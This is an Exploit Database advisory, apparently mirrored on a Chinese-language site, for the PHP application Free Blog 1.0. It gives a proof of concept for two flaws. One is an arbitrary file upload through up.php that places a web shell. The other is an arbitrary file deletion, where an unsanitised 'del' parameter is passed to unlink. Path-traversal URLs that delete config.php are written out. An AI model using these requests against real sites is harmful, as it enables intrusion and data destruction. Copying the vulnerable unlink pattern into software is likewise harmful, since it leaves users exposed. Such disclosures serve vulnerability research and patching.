Free Blog 1.0 – Multiple Vulnerabilities

• Exploit Database
• 109 阅读

• 作者： cr4wl3r
  日期： 2013-01-09
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/23994/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36

  # Free Blog 1.0 Multiple Vulnerability # By cr4wl3r http://bastardlabs.info # http://bastardlabs.info/exploits/Free_Blog.txt # Software Link: http://blog.sdnex.com/ # Tested: Ubuntu 12.04.1 LTS   Proof of concept:   Arbitrary File Upload Vulnerability   http://bastardlabs/blog_path/up.php   Shell will be available here   http://bastardlabs/blog_path/log/images/shell.php       Arbitrary File Deletion Vulnerability   ---------- 49 <?php 50 if($_GET[&apos;del&apos;]){ 51 $id=$_GET[&apos;del&apos;]; 52 unlink("./log/images/$id"); 53 } 54 ?> ----------   http://bastardlabs/blog_path/up.php?del=../../[file] http://bastardlabs/blog_path/up.php?del=../../config.php   ------------------------------ My sweetheart http://www.photoshow.com/watch/rx9IX5ZS